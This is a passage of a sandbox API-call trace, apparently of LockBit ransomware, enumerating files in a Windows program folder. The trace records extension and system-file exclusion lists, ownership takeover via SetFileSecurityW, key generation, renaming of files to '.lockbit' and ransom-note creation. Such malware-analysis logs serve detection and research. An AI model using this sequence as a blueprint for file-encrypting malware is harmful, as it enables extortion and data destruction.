maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.475] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0085.475] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.475] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.475] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0085.475] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.475] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.475] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.476] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.476] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.476] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.476] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.476] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.476] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.476] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.476] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.478] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.478] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.478] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.478] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.478] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.478] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.478] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.478] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.478] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.478] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.478] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.478] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.478] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.478] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.478] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.479] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.479] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.479] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.479] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0085.479] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0085.479] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0085.479] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.479] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.479] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0085.479] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0085.480] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.480] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png") returned=".png" [0085.480] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.480] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.480] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.480] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.481] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.481] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.481] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.481] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.481] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.481] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.481] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.481] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.481] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.481] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.481] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png.lockbit") returned 97 [0085.481] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.482] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.482] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.482] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.483] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.483] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.483] RtlFreeAnsiString (AnsiString="\\") [0085.483] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0085.483] malloc (_Size=0x200) returned 0x77d800 [0085.483] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.483] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.484] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.484] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.484] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.485] CloseHandle (hObject=0x3ac) returned 1 [0085.485] free (_Block=0x77d800) [0085.485] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0085.485] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.485] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.486] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3118) returned 1 [0085.486] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.487] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.487] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0085.487] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.488] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.488] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0085.488] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0085.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.494] malloc (_Size=0xd8) returned 0x77d800 [0085.494] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd8, FileInformationClass=0xa) returned 0x0 [0085.495] free (_Block=0x77d800) [0085.495] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.495] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.495] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.495] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f33c564, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f33c564, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0085.495] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.495] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.495] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0085.495] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.495] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.495] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.495] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.495] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.495] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.495] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.496] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.496] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.496] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.496] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.496] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.496] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.497] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.497] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.497] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.497] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.497] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.497] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0085.497] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0085.497] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0085.497] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.497] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.497] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0085.497] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.497] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.497] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png") returned=".png" [0085.497] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.498] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.498] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.498] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.498] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.499] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.499] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.499] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.499] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.499] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.499] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.499] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png.lockbit") returned 88 [0085.499] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.500] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.500] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.500] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.500] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.501] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.501] RtlFreeAnsiString (AnsiString="\\") [0085.501] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0085.501] malloc (_Size=0x200) returned 0x77d800 [0085.501] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.501] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.501] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.501] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.504] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.504] CloseHandle (hObject=0x3c0) returned 1 [0085.505] free (_Block=0x77d800) [0085.505] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0085.505] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.505] malloc (_Size=0x40068) returned 0x2031ed0 [0085.506] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=4955) returned 1 [0085.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0085.507] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0085.508] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0085.520] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.520] malloc (_Size=0xc6) returned 0x77d800 [0085.520] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0085.520] free (_Block=0x77d800) [0085.520] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.521] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.521] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.521] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f33c564, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f33c564, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0085.521] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.521] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.521] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0085.521] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.521] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.521] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.521] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.521] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.521] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.521] lstrcmpiW (lpString1=".msi", 